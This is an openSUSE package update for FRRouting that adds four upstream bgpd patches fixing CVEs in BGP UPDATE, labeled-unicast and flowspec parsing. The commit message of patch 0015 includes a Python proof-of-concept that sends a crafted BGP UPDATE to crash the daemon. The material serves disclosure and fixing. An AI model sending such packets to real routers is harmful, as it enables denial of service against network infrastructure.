Accepting request 1130736 from home:mtomaschewski:frr

- Apply upstream fix for a crash on malformed BGP UPDATE message
  with an EOR, because the presence of EOR does not lead to a
  treat-as-withdraw outcome (CVE-2023-47235,1216896,6814f2e013)
  [+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch]
- Apply upstream fix for a crash on crafted BGP UPDATE message with
  a MP_UNREACH_NLRI attribute and additional NLRI data (CVE-2023-47234,
  bsc#1216897,ttps://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf)
  [+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch]
- Apply upstream fix for attempts to read beyond the end of the
  stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,ab362eae68)
  [+ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch]
- Apply upstream fix for an nlri length of zero mishandling, aka
  "flowspec overflow" (CVE-2023-38406,bsc#1216900,0b999c886e)
  [+ 0018-bgpd-Flowspec-overflow-issue.patch]

OBS-URL: https://build.opensuse.org/request/show/1130736
OBS-URL: https://build.opensuse.org/package/show/network/frr?expand=0&rev=57

0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch

@@ -0,0 +1,109 @@
+From fcd12ca92baf2be4b191ddc3d3021c276c635930 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Fri, 27 Oct 2023 11:56:45 +0300
+Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of
+ malformed attrs
+Upstream: yes
+CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b
+
+Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
+processed as a normal UPDATE without mandatory attributes, that could lead
+to harmful behavior. In this case, a crash for route-maps with the configuration
+such as:
+
+```
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 127.0.0.1 remote-as external
+ neighbor 127.0.0.1 passive
+ neighbor 127.0.0.1 ebgp-multihop
+ neighbor 127.0.0.1 disable-connected-check
+ neighbor 127.0.0.1 update-source 127.0.0.2
+ neighbor 127.0.0.1 timers 3 90
+ neighbor 127.0.0.1 timers connect 1
+ !
+ address-family ipv4 unicast
+  neighbor 127.0.0.1 addpath-tx-all-paths
+  neighbor 127.0.0.1 default-originate
+  neighbor 127.0.0.1 route-map RM_IN in
+ exit-address-family
+exit
+!
+route-map RM_IN permit 10
+ set as-path prepend 200
+exit
+```
+
+Send a malformed optional transitive attribute:
+
+```
+import socket
+import time
+
+OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
+b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
+b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
+b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
+b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
+b"\x80\x00\x00\x00")
+
+KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
+
+UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.2', 179))
+s.send(OPEN)
+data = s.recv(1024)
+s.send(KEEPALIVE)
+data = s.recv(1024)
+s.send(UPDATE)
+data = s.recv(1024)
+time.sleep(100)
+s.close()
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Signed-off-by: Marius Tomaschewski <mt@suse.com>
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 42a2342f6f..fc92dbb326 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3104,10 +3104,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ 	uint8_t type = 0;
+ 
+ 	/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
+-	 * empty UPDATE.  */
++	 * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it,
++	 * we will pass it to be processed as a normal UPDATE without mandatory
++	 * attributes, that could lead to harmful behavior.
++	 */
+ 	if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
+ 	    !length)
+-		return BGP_ATTR_PARSE_PROCEED;
++		return BGP_ATTR_PARSE_WITHDRAW;
+ 
+ 	/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+ 	   to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+@@ -3532,7 +3535,13 @@ done:
+ 	aspath_unintern(&as4_path);
+ 
+ 	transit = bgp_attr_get_transit(attr);
+-	if (ret != BGP_ATTR_PARSE_ERROR) {
++	/* If we received an UPDATE with mandatory attributes, then
++	 * the unrecognized transitive optional attribute of that
++	 * path MUST be passed. Otherwise, it's an error, and from
++	 * security perspective it might be very harmful if we continue
++	 * here with the unrecognized attributes.
++	 */
++	if (ret == BGP_ATTR_PARSE_PROCEED) {
+ 		/* Finally intern unknown attribute. */
+ 		if (transit)
+ 			bgp_attr_set_transit(attr, transit_intern(transit));
+-- 
+2.35.3
+

0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch

@@ -0,0 +1,90 @@
+From 4e39893cfb2d4dbc13fa6d6a25bbf623ed14a4fb Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Sun, 29 Oct 2023 22:44:45 +0200
+Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI
+Upstream: yes
+CVE-2023-47234,bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf
+
+If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
+no mandatory path attributes received.
+
+In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
+as a new data, but without mandatory attributes, it's a malformed packet.
+
+In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
+handle that.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Signed-off-by: Marius Tomaschewski <mt@suse.com>
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index fc92dbb326..ae0f052c42 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3112,15 +3112,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ 	    !length)
+ 		return BGP_ATTR_PARSE_WITHDRAW;
+ 
+-	/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+-	   to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+-	   are present, it should.  Check for any other attribute being present
+-	   instead.
+-	 */
+-	if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
+-	     CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))))
+-		return BGP_ATTR_PARSE_PROCEED;
+-
+ 	if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
+ 		type = BGP_ATTR_ORIGIN;
+ 
+@@ -3139,6 +3130,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ 	    && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF)))
+ 		type = BGP_ATTR_LOCAL_PREF;
+ 
++	/* An UPDATE message that contains the MP_UNREACH_NLRI is not required
++	 * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI
++	 * are present, it should. Check for any other attribute being present
++	 * instead.
++	 */
++	if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
++	    CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))
++		return type ? BGP_ATTR_PARSE_MISSING_MANDATORY
++			    : BGP_ATTR_PARSE_PROCEED;
++
+ 	/* If any of the well-known mandatory attributes are not present
+ 	 * in an UPDATE message, then "treat-as-withdraw" MUST be used.
+ 	 */
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index 23767153b2..27708c0689 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -382,6 +382,7 @@ enum bgp_attr_parse_ret {
+ 	/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
+ 	 */
+ 	BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
++	BGP_ATTR_PARSE_MISSING_MANDATORY = -4,
+ };
+ 
+ struct bpacket_attr_vec_arr;
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index 20c642190b..b175a26ab9 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -1951,7 +1951,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
+ 	/* Network Layer Reachability Information. */
+ 	update_len = end - stream_pnt(s);
+ 
+-	if (update_len && attribute_len) {
++	/* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then
++	 * NLRIs should be handled as a new data. Though, if we received
++	 * NLRIs without mandatory attributes, they should be ignored.
++	 */
++	if (update_len && attribute_len &&
++	    attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) {
+ 		/* Set NLRI portion to structure. */
+ 		nlris[NLRI_UPDATE].afi = AFI_IP;
+ 		nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
+-- 
+2.35.3
+

0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch

@@ -0,0 +1,58 @@
+From 6979aa1574167121e260120504c77b47bb25230e Mon Sep 17 00:00:00 2001
+From: Donald Sharp <sharpd@nvidia.com>
+Date: Fri, 3 Mar 2023 21:58:33 -0500
+Subject: [PATCH] bgpd: Fix use beyond end of stream of labeled unicast parsing
+Upstream: yes
+CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f
+
+Fixes a couple crashes associated with attempting to read
+beyond the end of the stream.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donald Sharp <sharpd@nvidia.com>
+(cherry picked from commit 7404a914b0cafe046703c8381903a80d3def8f8b)
+Signed-off-by: Marius Tomaschewski <mt@suse.com>
+
+diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c
+index 38f34a8927..64d1ff70ca 100644
+--- a/bgpd/bgp_label.c
++++ b/bgpd/bgp_label.c
+@@ -312,6 +312,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen,
+ 	uint8_t llen = 0;
+ 	uint8_t label_depth = 0;
+ 
++	if (plen < BGP_LABEL_BYTES)
++		return 0;
++
+ 	for (; data < lim; data += BGP_LABEL_BYTES) {
+ 		memcpy(label, data, BGP_LABEL_BYTES);
+ 		llen += BGP_LABEL_BYTES;
+@@ -374,6 +377,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
+ 			memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN);
+ 			addpath_id = ntohl(addpath_id);
+ 			pnt += BGP_ADDPATH_ID_LEN;
++
++			if (pnt >= lim)
++				return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+ 		}
+ 
+ 		/* Fetch prefix length. */
+@@ -392,6 +398,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
+ 
+ 		/* Fill in the labels */
+ 		llen = bgp_nlri_get_labels(peer, pnt, psize, &label);
++		if (llen == 0) {
++			flog_err(
++				EC_BGP_UPDATE_RCV,
++				"%s [Error] Update packet error (wrong label length 0)",
++				peer->host);
++			bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR,
++					BGP_NOTIFY_UPDATE_INVAL_NETWORK);
++			return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH;
++		}
+ 		p.prefixlen = prefixlen - BSIZE(llen);
+ 
+ 		/* There needs to be at least one label */
+-- 
+2.35.3
+

0018-bgpd-Flowspec-overflow-issue.patch

@@ -0,0 +1,37 @@
+From d4ead6bc0b2f0d4682661837d202502127060476 Mon Sep 17 00:00:00 2001
+From: Donald Sharp <sharpd@nvidia.com>
+Date: Thu, 23 Feb 2023 13:29:32 -0500
+Subject: [PATCH] bgpd: Flowspec overflow issue
+Upstream: yes
+CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3
+
+According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>>
+Specifying 0 as a length makes BGP get all warm on the inside.  Which
+in this case is not a good thing at all.  Prevent warmth, stay cold
+on the inside.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donald Sharp <sharpd@nvidia.com>
+Signed-off-by: Marius Tomaschewski <mt@suse.com>
+
+diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
+index fe1f0d50f8..98ec1ed073 100644
+--- a/bgpd/bgp_flowspec.c
++++ b/bgpd/bgp_flowspec.c
+@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
+ 				psize);
+ 			return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+ 		}
++
++		if (psize == 0) {
++			flog_err(EC_BGP_FLOWSPEC_PACKET,
++				 "Flowspec NLRI length 0 which makes no sense");
++			return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
++		}
++
+ 		if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) {
+ 			flog_err(
+ 				EC_BGP_FLOWSPEC_PACKET,
+-- 
+2.35.3
+

frr.changes

@@ -1,3 +1,21 @@
+-------------------------------------------------------------------
+Mon Dec  4 09:11:46 UTC 2023 - Marius Tomaschewski <mt@suse.com>
+
+- Apply upstream fix for a crash on malformed BGP UPDATE message
+  with an EOR, because the presence of EOR does not lead to a
+  treat-as-withdraw outcome (CVE-2023-47235,1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b)
+  [+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch]
+- Apply upstream fix for a crash on crafted BGP UPDATE message with
+  a MP_UNREACH_NLRI attribute and additional NLRI data (CVE-2023-47234,
+  bsc#1216897,ttps://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf)
+  [+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch]
+- Apply upstream fix for attempts to read beyond the end of the
+  stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f)
+  [+ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch]
+- Apply upstream fix for an nlri length of zero mishandling, aka
+  "flowspec overflow" (CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3)
+  [+ 0018-bgpd-Flowspec-overflow-issue.patch]
+
 -------------------------------------------------------------------
 Mon Oct 30 12:38:21 UTC 2023 - Marius Tomaschewski <mt@suse.com>
 

frr.spec

@@ -53,6 +53,10 @@ Patch11:        0011-babeld-fix-11808-to-avoid-infinite-loops.patch
 Patch12:        0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
 Patch13:        0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
 Patch14:        0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch
+Patch15:        0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch
+Patch16:        0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch
+Patch17:        0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch
+Patch18:        0018-bgpd-Flowspec-overflow-issue.patch
 BuildRequires:  autoconf
 BuildRequires:  automake
 BuildRequires:  bison >= 2.7
@@ -204,6 +208,10 @@ developing OSPF-API and frr applications.
 %patch12 -p1
 %patch13 -p1
 %patch14 -p1
+%patch15 -p1
+%patch16 -p1
+%patch17 -p1
+%patch18 -p1
 
 %build
 # GCC LTO objects must be "fat" to avoid assembly errors